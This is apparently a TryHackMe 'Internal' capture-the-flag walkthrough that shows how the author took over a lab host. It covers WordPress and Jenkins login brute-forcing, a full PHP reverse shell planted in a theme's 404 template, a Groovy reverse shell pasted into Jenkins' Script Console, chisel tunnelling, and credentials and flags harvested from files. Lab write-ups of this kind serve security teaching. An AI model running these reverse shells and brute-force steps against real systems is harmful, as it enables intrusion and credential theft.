INTERNAL

 INTERNAL(TRYHACKME)


First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below.
Key open ports and services include:
  1. Web Servers:
  2. Port 80 (HTTP): Running Apache2 Ubuntu Default Page. It supports OPTIONSTRACE (flagged as potentially risky), GETHEAD, and POST methods. The webpage title is "INTERNAL".
  3. SSH Protocol
  4. Port 22 (SSH): Running Linux.

┌──(root㉿kali)-[/home/luis/Descargas]

└─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv

Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST

NSE: Loaded 126 scripts for scanning.

NSE: Script Pre-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 12:06

Completed NSE at 12:06, 0.00s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 12:06

Completed NSE at 12:06, 0.00s elapsed

Initiating SYN Stealth Scan at 12:06

Scanning 10.10.216.78 [65535 ports]

Discovered open port 80/tcp on 10.10.216.78

Discovered open port 22/tcp on 10.10.216.78

Increasing send delay for 10.10.216.78 from 0 to 5 due to max_successful_tryno increase to 4

Increasing send delay for 10.10.216.78 from 5 to 10 due to max_successful_tryno increase to 5

Increasing send delay for 10.10.216.78 from 10 to 20 due to 1662 out of 5538 dropped probes since last increase.

Completed SYN Stealth Scan at 12:06, 16.73s elapsed (65535 total ports)

NSE: Script scanning 10.10.216.78.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 12:06

Completed NSE at 12:07, 19.24s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 12:07

Completed NSE at 12:07, 0.01s elapsed

Nmap scan report for 10.10.216.78

Host is up, received user-set (0.33s latency).

Scanned at 2025-08-07 12:06:29 CEST for 36s

Not shown: 65533 closed tcp ports (reset)

PORT  STATE SERVICE REASON

22/tcp open ssh    syn-ack ttl 61

| ssh-hostkey:

|  2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)

| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzpZTvmUlaHPpKH8X2SHMndoS+GsVlbhABHJt4TN/nKUSYeFEHbNzutQnj+DrUEwNMauqaWCY7vNeYguQUXLx4LM5ukMEC8IuJo0rcuKNmlyYrgBlFws3q2956v8urY7/McCFf5IsItQxurCDyfyU/erO7fO02n2iT5k7Bw2UWf8FPvM9/jahisbkA9/FQKou3mbaSANb5nSrPc7p9FbqKs1vGpFopdUTI2dl4OQ3TkQWNXpvaFl0j1ilRynu5zLr6FetD5WWZXAuCNHNmcRo/aPdoX9JXaPKGCcVywqMM/Qy+gSiiIKvmavX6rYlnRFWEp25EifIPuHQ0s8hSXqx5

|  256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMFOI/P6nqicmk78vSNs4l+vk2+BQ0mBxB1KlJJPCYueaUExTH4Cxkqkpo/zJfZ77MHHDL5nnzTW+TO6e4mDMEw=

|  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMlxubXGh//FE3OqdyitiEwfA2nNdCtdgLfDQxFHPyY0

80/tcp open http   syn-ack ttl 61

|_http-title: Apache2 Ubuntu Default Page: It works

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

NSE: Script Post-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 12:07

Completed NSE at 12:07, 0.00s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 12:07

Completed NSE at 12:07, 0.00s elapsed

Read data files from: /usr/share/nmap

Nmap done: 1 IP address (1 host up) scanned in 36.46 seconds

          Raw packets sent: 79035 (3.478MB) | Rcvd: 75979 (3.039MB)

We can see that gobuster found several interesting directories which are:
  1. /.php (Status: 403 - Redirect)

  3. /blog (Status: 301 -OK)

  5. /wordpress/ (Status: 301 - OK)

  7. /javascript (Status: 301 - OK)

Now, we have to go to Google and paste the IP Address with port and we will discover this webpage which you can see in the picture below (http://10.10.216.78:/).

┌──(root㉿kali)-[/home/luis/Descargas]

└─# gobuster dir -u "http://10.10.216.78/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,tar,back

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                    http://10.10.216.78/

[+] Method:                 GET

[+] Threads:                10

[+] Wordlist:               /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

[+] Negative Status codes:  404

[+] User Agent:             gobuster/3.6

[+] Extensions:             php,txt,tar,back

[+] Timeout:                10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

/.php                (Status: 403) [Size: 277]

/blog                (Status: 301) [Size: 311] [--> http://10.10.216.78/blog/]

/wordpress           (Status: 301) [Size: 316] [--> http://10.10.216.78/wordpress/]

/javascript          (Status: 301) [Size: 317] [--> http://10.10.216.78/javascript/]

Progress: 8640 / 1102800 (0.78%)^C

[!] Keyboard interrupt detected, terminating.

Progress: 8640 / 1102800 (0.78%)

===============================================================

Finished

===============================================================                        

 Now, we have to configurate the etc/hosts file where we must write the IP ADDRESS and the dns which is  internal.thm as you can see below.

┌──(root㉿kali)-[/home/luis/Descargas]

└─# nano /etc/hosts

127.0.0.1      localhost

127.0.1.1      kali

10.10.216.78   internal.thm

# The following lines are desirable for IPv6 capable hosts

::1    localhost ip6-localhost ip6-loopback

ff02::1 ip6-allnodes

ff02::2 ip6-allrouters

And now we can see the picture below if has been good configurated by us.

In addition, we have to execute the analysis with wpscan and we be able to obtain an user which is admin as you can see below.

┌──(root㉿kali)-[/home/luis/Descargas]

└─# wpscan --url http://internal.thm/blog/ -e u,p            

_______________________________________________________________

        __         _______  _____

        \ \       / / __ \ / ____|

         \ \ /\ / /| |__) | (___  ___ __ _ _ __ ®

          \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

           \ /\ / | |    ____) | (__| (_| | | | |

            \/ \/  |_|   |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team

                        Version 3.8.28

      Sponsored by Automattic - https://automattic.com/

      @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.216.78]

[+] Started: Thu Aug 7 12:30:39 2025

Interesting Finding(s):

[+] Headers

 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)

 | Found By: Headers (Passive Detection)

 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

 | References:

 | - http://codex.wordpress.org/XML-RPC_Pingback_API

 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/

 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/

 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/

 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://internal.thm/blog/readme.html

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 60%

 | References:

 | - https://www.iplocation.net/defend-wordpress-from-ddos

 | - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).

 | Found By: Rss Generator (Passive Detection)

 | - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

 | - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen

 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/

 | Last Updated: 2025-04-15T00:00:00.000Z

 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt

 | [!] The version is out of date, the latest version is 3.9

 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507

 | Style Name: Twenty Seventeen

 | Style URI: https://wordpress.org/themes/twentyseventeen/

 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...

 | Author: the WordPress team

 | Author URI: https://wordpress.org/

 |

 | Found By: Css Style In Homepage (Passive Detection)

 |

 | Version: 2.3 (80% confidence)

 | Found By: Style (Passive Detection)

 | - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)

 Brute Forcing Author IDs - Time: 00:00:02 <=========================================================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] admin

 | Found By: Author Posts - Author Pattern (Passive Detection)

 | Confirmed By:

 | Rss Generator (Passive Detection)

 | Wp Json Api (Aggressive Detection)

 |  - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1

 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)

 | Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.

[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Aug 7 12:31:02 2025

[+] Requests Done: 54

[+] Cached Requests: 7

[+] Data Sent: 14.778 KB

[+] Data Received: 472.771 KB

[+] Memory used: 263.469 MB

[+] Elapsed time: 00:00:22

Then we must execute the brute force and should be able to discover the user password which you can see below: myboy2

┌──(root㉿kali)-[/home/luis/Descargas]

└─# wpscan --url http://internal.thm/blog/ -U admin -P /usr/share/wordlists/rockyou.txt 

_______________________________________________________________

        __         _______  _____

        \ \       / / __ \ / ____|

         \ \ /\ / /| |__) | (___  ___ __ _ _ __ ®

          \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

           \ /\ / | |    ____) | (__| (_| | | | |

            \/ \/  |_|   |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team

                        Version 3.8.28

      Sponsored by Automattic - https://automattic.com/

      @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.216.78]

[+] Started: Thu Aug 7 12:40:23 2025

Interesting Finding(s):

[+] Headers

 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)

 | Found By: Headers (Passive Detection)

 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

 | References:

 | - http://codex.wordpress.org/XML-RPC_Pingback_API

 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/

 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/

 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/

 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://internal.thm/blog/readme.html

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 60%

 | References:

 | - https://www.iplocation.net/defend-wordpress-from-ddos

 | - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).

 | Found By: Rss Generator (Passive Detection)

 | - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

 | - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen

 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/

 | Last Updated: 2025-04-15T00:00:00.000Z

 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt

 | [!] The version is out of date, the latest version is 3.9

 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507

 | Style Name: Twenty Seventeen

 | Style URI: https://wordpress.org/themes/twentyseventeen/

 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...

 | Author: the WordPress team

 | Author URI: https://wordpress.org/

 |

 | Found By: Css Style In Homepage (Passive Detection)

 |

 | Version: 2.3 (80% confidence)

 | Found By: Style (Passive Detection)

 | - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)

 Checking Config Backups - Time: 00:00:22 <========================================================================> (137 / 137) 100.00% Time: 00:00:22

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s

11:19 <> (Trying admin / calderon Time: 00:11:20 <>Trying admin / leigh Time: 00:11:21 <> (3Trying admin / dipset1 Time: 00:11:21 <> Trying admin / chico Time: 00:11:22 <> (3Trying admin / my2boys Time: 00:11:23 <> [SUCCESS] - admin / my2boys             

Trying admin / my2boys Time: 00:11:23 <> Trying admin / princess7 Time: 00:11:23 <> (3885 / 14348277) 0.02% ETA: ??:??:??

[!] Valid Combinations Found:

 | Username: admin, Password: my2boys

[!] No WPScan API Token given, as a result vulnerability data has not been output.

[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Aug 7 12:52:15 2025

[+] Requests Done: 4025

[+] Cached Requests: 38

[+] Data Sent: 2.037 MB

[+] Data Received: 2.306 MB

[+] Memory used: 298.664 MB

[+] Elapsed time: 00:11:52

As we he discovered the password we should write which is my2boys as you can see at the bottom of the page.


Now, we have just accessed and we must search in the options appearances and then Theme Editor as you can see in the second picture below.


Now, we have to create our reverse shell and introduce in the option 404 template as you can see in the picture below.

This is the malicious code we have to write in 404 template where you can discover in this link:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

<?php

// php-reverse-shell - A Reverse Shell implementation in PHP

// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

//

// This tool may be used for legal purposes only. Users take full responsibility

// for any actions performed using this tool. The author accepts no liability

// for damage caused by this tool. If these terms are not acceptable to you, then

// do not use this tool.

//

// In all other respects the GPL version 2 applies:

//

// This program is free software; you can redistribute it and/or modify

// it under the terms of the GNU General Public License version 2 as

// published by the Free Software Foundation.

//

// This program is distributed in the hope that it will be useful,

// but WITHOUT ANY WARRANTY; without even the implied warranty of

// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

// GNU General Public License for more details.

//

// You should have received a copy of the GNU General Public License along

// with this program; if not, write to the Free Software Foundation, Inc.,

// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

//

// This tool may be used for legal purposes only. Users take full responsibility

// for any actions performed using this tool. If these terms are not acceptable to

// you, then do not use this tool.

//

// You are encouraged to send comments, improvements or suggestions to

// me at pentestmonkey@pentestmonkey.net

//

// Description

// -----------

// This script will make an outbound TCP connection to a hardcoded IP and port.

// The recipient will be given a shell running as the current user (apache normally).

//

// Limitations

// -----------

// proc_open and stream_set_blocking require PHP version 4.3+, or 5+

// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.

// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.

//

// Usage

// -----

// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.


set_time_limit (0);

$VERSION = "1.0";

$ip = '10.2.2.67'; // CHANGE THIS

$port = 4444;    // CHANGE THIS

$chunk_size = 1400;

$write_a = null;

$error_a = null;

$shell = 'uname -a; w; id; /bin/sh -i';

$daemon = 0;

$debug = 0;


//

// Daemonise ourself if possible to avoid zombies later

//


// pcntl_fork is hardly ever available, but will allow us to daemonise

// our php process and avoid zombies. Worth a try...

if (function_exists('pcntl_fork')) {

// Fork and have the parent process exit

$pid = pcntl_fork();

if ($pid == -1) {

printit("ERROR: Can't fork");

exit(1);

}

if ($pid) {

exit(0); // Parent exits

}


// Make the current process a session leader

// Will only succeed if we forked

if (posix_setsid() == -1) {

printit("Error: Can't setsid()");

exit(1);

}


$daemon = 1;

} else {

printit("WARNING: Failed to daemonise. This is quite common and not fatal.");

}


// Change to a safe directory

chdir("/");


// Remove any umask we inherited

umask(0);


//

// Do the reverse shell...

//


// Open reverse connection

$sock = fsockopen($ip, $port, $errno, $errstr, 30);

if (!$sock) {

printit("$errstr ($errno)");

exit(1);

}


// Spawn shell process

$descriptorspec = array(

  0 => array("pipe", "r"), // stdin is a pipe that the child will read from

  1 => array("pipe", "w"), // stdout is a pipe that the child will write to

  2 => array("pipe", "w")  // stderr is a pipe that the child will write to

);


$process = proc_open($shell, $descriptorspec, $pipes);


if (!is_resource($process)) {

printit("ERROR: Can't spawn shell");

exit(1);

}


// Set everything to non-blocking

// Reason: Occsionally reads will block, even though stream_select tells us they won't

stream_set_blocking($pipes[0], 0);

stream_set_blocking($pipes[1], 0);

stream_set_blocking($pipes[2], 0);

stream_set_blocking($sock, 0);


printit("Successfully opened reverse shell to $ip:$port");


while (1) {

// Check for end of TCP connection

if (feof($sock)) {

printit("ERROR: Shell connection terminated");

break;

}


// Check for end of STDOUT

if (feof($pipes[1])) {

printit("ERROR: Shell process terminated");

break;

}


// Wait until a command is end down $sock, or some

// command output is available on STDOUT or STDERR

$read_a = array($sock, $pipes[1], $pipes[2]);

$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);


// If we can read from the TCP socket, send

// data to process's STDIN

if (in_array($sock, $read_a)) {

if ($debug) printit("SOCK READ");

$input = fread($sock, $chunk_size);

if ($debug) printit("SOCK: $input");

fwrite($pipes[0], $input);

}


// If we can read from the process's STDOUT

// send data down tcp connection

if (in_array($pipes[1], $read_a)) {

if ($debug) printit("STDOUT READ");

$input = fread($pipes[1], $chunk_size);

if ($debug) printit("STDOUT: $input");

fwrite($sock, $input);

}


// If we can read from the process's STDERR

// send data down tcp connection

if (in_array($pipes[2], $read_a)) {

if ($debug) printit("STDERR READ");

$input = fread($pipes[2], $chunk_size);

if ($debug) printit("STDERR: $input");

fwrite($sock, $input);

}

}


fclose($sock);

fclose($pipes[0]);

fclose($pipes[1]);

fclose($pipes[2]);

proc_close($process);


// Like print, but does nothing if we've daemonised ourself

// (I can't figure out how to redirect STDOUT like a proper daemon)

function printit ($string) {

if (!$daemon) {

print "$string\n";

}

}


?> 


Now we have to be in listing with the port 4444 which we have configurated before as you can see below.

┌──(luis㉿kali)-[~]

└─$ nc -lvnp 4444

listening on [any] 4444 ...

connect to [10.2.2.76] from (UNKNOWN) [10.10.216.78] 35126

Linux internal 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

 11:12:12 up 1:07, 0 users, load average: 0.00, 0.00, 0.00

USER    TTY     FROM            LOGIN@  IDLE  JCPU  PCPU WHAT

uid=33(www-data) gid=33(www-data) groups=33(www-data)

/bin/sh: 0: can't access tty; job control turned off

Once we have obtained the shell was successfully ,
accessing it (likely through a specific URL like http://internal.thm/blog/index.php/2020/08/03/hello-world1/ ) triggered the execution of the JSP.
Then, the target machine connected back to listener giving a command shell on the target.

Now should execute this commands you can see below which are:
  1. python -c 'import pty; pty.spawn("/bin/bash")' (To create persistence in the vulnerable machine)
  2. ls (To listing files or directories)
  3. cd /home (To change directory to home)
  4. cd /opt (To change directory to opt )
  5. cat wp-save.txt (To see the file whose name is wp-save.txt )(IMPORTANT INFORMATION  HERE WE HAVE DISCOVERED  THE PASSWORD USER FROM aubreanna:bubb13guM!@#123).

$ python -c 'import pty; pty.spawn("/bin/bash")'

www-data@internal:/$ ls 

ls

bin   dev  initrd.img     lib64    mnt  root snap     sys var

boot  etc  initrd.img.old lost+found opt  run  srv      tmp vmlinuz

cdrom home lib        media    proc sbin swap.img usr vmlinuz.old

www-data@internal:/$ cd /home   

cd /home

www-data@internal:/home$ ls

ls

aubreanna

www-data@internal:/home$ cd aubreanna   

cd aubreanna

bash: cd: aubreanna: Permission denied

www-data@internal:/home$ ls

ls

aubreanna

www-data@internal:/home$ cd ..   

cd ..

www-data@internal:/$ ls

ls

bin   dev  initrd.img     lib64    mnt  root snap     sys var

boot  etc  initrd.img.old lost+found opt  run  srv      tmp vmlinuz

cdrom home lib        media    proc sbin swap.img usr vmlinuz.old

www-data@internal:/$ cd opt

cd opt

www-data@internal:/opt$ ls

ls

containerd wp-save.txt

www-data@internal:/opt$ cat wp-save.txt

cat wp-save.txt

Bill,


Aubreanna needed these credentials for something later. Let her know you have them and where they are.


aubreanna:bubb13guM!@#123

www-data@internal:/opt$

As we have got the password we should use the ssh remote access as you can see below.

┌──(luis㉿kali)-[~]

└─$ ssh aubreanna@10.10.216.78

The authenticity of host '10.10.216.78 (10.10.216.78)' can't be established.

ED25519 key fingerprint is SHA256:seRYczfyDrkweytt6CJT/aBCJZMIcvlYYrTgoGxeHs4.

This key is not known by any other names.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '10.10.216.78' (ED25519) to the list of known hosts.

aubreanna@10.10.216.78's password:

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation: https://help.ubuntu.com

 * Management:    https://landscape.canonical.com

 * Support:       https://ubuntu.com/advantage

 System information as of Thu Aug 7 11:16:38 UTC 2025

 System load: 0.0              Processes:             110

 Usage of /:  63.7% of 8.79GB  Users logged in:       0

 Memory usage: 35%              IP address for eth0:   10.10.216.78

 Swap usage:  0%               IP address for docker0: 172.17.0.1

 => There is 1 zombie process.

 * Canonical Livepatch is available for installation.

  - Reduce system reboots and improve kernel security. Activate at:

    https://ubuntu.com/livepatch

0 packages can be updated.

0 updates are security updates.

Last login: Mon Aug 3 19:56:19 2020 from 10.6.2.56

aubreanna@internal:~$

aubreanna@internal:~$ ls -la

total 56

drwx------ 7 aubreanna aubreanna 4096 Aug 3 2020 .

drwxr-xr-x 3 root     root     4096 Aug 3 2020 ..

-rwx------ 1 aubreanna aubreanna   7 Aug 3 2020 .bash_history

-rwx------ 1 aubreanna aubreanna 220 Apr 4 2018 .bash_logout

-rwx------ 1 aubreanna aubreanna 3771 Apr 4 2018 .bashrc

drwx------ 2 aubreanna aubreanna 4096 Aug 3 2020 .cache

drwx------ 3 aubreanna aubreanna 4096 Aug 3 2020 .gnupg

drwx------ 3 aubreanna aubreanna 4096 Aug 3 2020 .local

-rwx------ 1 root     root      223 Aug 3 2020 .mysql_history

-rwx------ 1 aubreanna aubreanna 807 Apr 4 2018 .profile

drwx------ 2 aubreanna aubreanna 4096 Aug 3 2020 .ssh

-rwx------ 1 aubreanna aubreanna   0 Aug 3 2020 .sudo_as_admin_successful

-rwx------ 1 aubreanna aubreanna  55 Aug 3 2020 jenkins.txt

drwx------ 3 aubreanna aubreanna 4096 Aug 3 2020 snap

Gotcha! the user.txt has been discovered by us as you can see below in this path which is:

  1. /home/aubreanna/user.txt

-rwx------ 1 aubreanna aubreanna  21 Aug 3 2020 user.txt

aubreanna@internal:~$ cat user.txt

THM{int3rna1_fl4g_1}

aubreanna@internal:~$ ls

jenkins.txt  snap user.txt

aubreanna@internal:~$ cat jenkins.txt

Internal Jenkins service is running on 172.17.0.2:8080


As we can see here we have got discover the next step which we need use whichever toolkit to obtain Jenkins service in ours attacker machine.

aubreanna@internal:~$

aubreanna@internal:~$ hostname -I

10.10.216.78 172.17.0.1

In addition, we can see in the picture below the port which is 8080 in the localhost machine.

aubreanna@internal:~$ ss -tulpn

Netid      State        Recv-Q       Send-Q                   Local Address:Port                Peer Address:Port       

udp        UNCONN       0            0                        127.0.0.53%lo:53                       0.0.0.0:*          

udp        UNCONN       0            0                    10.10.216.78%eth0:68                       0.0.0.0:*          

tcp        LISTEN       0            128                          127.0.0.1:8080                     0.0.0.0:*          

tcp        LISTEN       0            128                      127.0.0.53%lo:53                       0.0.0.0:*          

tcp        LISTEN       0            128                            0.0.0.0:22                       0.0.0.0:*          

tcp        LISTEN       0            128                          127.0.0.1:40263                    0.0.0.0:*          

tcp        LISTEN       0            80                           127.0.0.1:3306                     0.0.0.0:*          

tcp        LISTEN       0            128                                  *:80                             *:*          

tcp        LISTEN       0            128                               [::]:22                          [::]:*

For it, we have to download this toolkit to obtain the port in our machine with this steps as you can see below:

  1. https://github.com/jpillora/chisel
  2.  chmod +x chisel_1.10.1_linux_amd64
  3. ./chisel_1.10.1_linux_amd64

┌──(luis㉿kali)-[~/Descargas]

└─$ chmod +x chisel_1.10.1_linux_amd64

┌──(luis㉿kali)-[~/Descargas]

└─$ ./chisel_1.10.1_linux_amd64

 Usage: chisel [command] [--help]

 Version: 1.10.1 (go1.23.1)

 Commands:

   server - runs chisel in server mode

   client - runs chisel in client mode

 Read more:

    https://github.com/jpillora/chisel

┌──(luis㉿kali)-[~/Descargas]

└─$ scp chisel_1.10.1_linux_amd64 aubreanna@10.10.216.78:/tmp

aubreanna@10.10.216.78's password:

chisel_1.10.1_linux_amd64

Now, we have to execute this command to obtain reverse connection as you can see below.

aubreanna@internal:~$ mv /tmp/chisel_1.10.1_linux_amd64 .

aubreanna@internal:~$ ./chisel_1.10.1_linux_amd64 client 10.2.2.76:8002 R:443:127.0.0.1:8080

2025/08/07 11:58:10 client: Connecting to ws://10.2.2.76:8002

2025/08/07 11:58:15 client: Connected (Latency 641.578452ms)


This command we will permit obtaining the localhost our victim as you can see below.

┌──(luis㉿kali)-[~/Descargas]

└─$ ./chisel_1.10.1_linux_amd64 server --reverse -p 8002

2025/08/07 13:55:21 server: Reverse tunnelling enabled

2025/08/07 13:55:21 server: Fingerprint VkzYzcJHq8soaNZxqTVeuo09pkVHiFx2ezJhkhHjaBI=

2025/08/07 13:55:21 server: Listening on http://0.0.0.0:8002

2025/08/07 13:58:12 server: session#1: tun: proxy#R:443=>8080: Listening

In addition, as we have discovered the user login from Jenkins let´s go to execute brute force as you can see below with the burpsuite toolkit where we have intercept the traffic and we have modified the header.


┌──(luis㉿kali)-[~/Descargas]

└─$ hydra 127.0.0.1 -s 443 -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txt

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-07 14:10:26

[WARNING] you specified port 443 for attacking a http service, however did not specify the -S ssl switch nor used https-..., therefore using plain HTTP

[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task

[DATA] attacking http-post-form://127.0.0.1:443/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password

Gotcha! we have got the user and password

[443][http-post-form] host: 127.0.0.1  login: admin  password: spongebob

[STATUS] attack finished for 127.0.0.1 (valid pair found)

1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-08-07 14:11:10

This is the script which we have write in the option Script Console as you can see below.

String host="10.2.2.76"

;int port=4444;String cmd="bash";

Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

To sump up, we have to execute the next commands which are:

  1. nc -lvnp 4444 (To obtaining the reverse shell)
  2. script /dev/null -c bash (To obtaining persistence in the machine)
  3. ^Z
  4. zsh: suspended nc -lvnp 4444
  5. stty raw -echo;fg (To obtaining persistence in the machine)
  6. export SHELL=bash (To obtaining bash command)
  7. export TERM=xterm (To obtaining persistence in the machine)
  8.  find / -name *.txt (To discover)

┌──(luis㉿kali)-[~/Descargas]

└─$ nc -lvnp 4444

listening on [any] 4444 ...

connect to [10.2.2.76] from (UNKNOWN) [10.10.216.78] 48558

script /dev/null -c bash

Script started, file is /dev/null

jenkins@jenkins:/$ ^Z

zsh: suspended nc -lvnp 4444

                                                                                                                             

┌──(luis㉿kali)-[~/Descargas]

└─$ stty raw -echo;fg

[2] - continued nc -lvnp 4444

                              reset xterm

jenkins@jenkins:/$ export SHELL=bash

jenkins@jenkins:/$ export TERM=xterm

jenkins@jenkins:/$ find / -name *.txt

/opt/note.txt

jenkins@jenkins:/$ cat /opt/note.txt

Aubreanna,


Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you

need access to the root user account.


root:tr0ub13guM!@#123

Now we have to execute ssh to enter as if we were an administrator as you can see below.

┌──(luis㉿kali)-[~]

└─$ ssh root@10.10.216.78

root@10.10.216.78's password:

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation: https://help.ubuntu.com

 * Management:    https://landscape.canonical.com

 * Support:       https://ubuntu.com/advantage

 System information as of Thu Aug 7 12:40:19 UTC 2025

 System load: 0.0              Processes:             121

 Usage of /:  63.8% of 8.79GB  Users logged in:       1

 Memory usage: 43%              IP address for eth0:   10.10.216.78

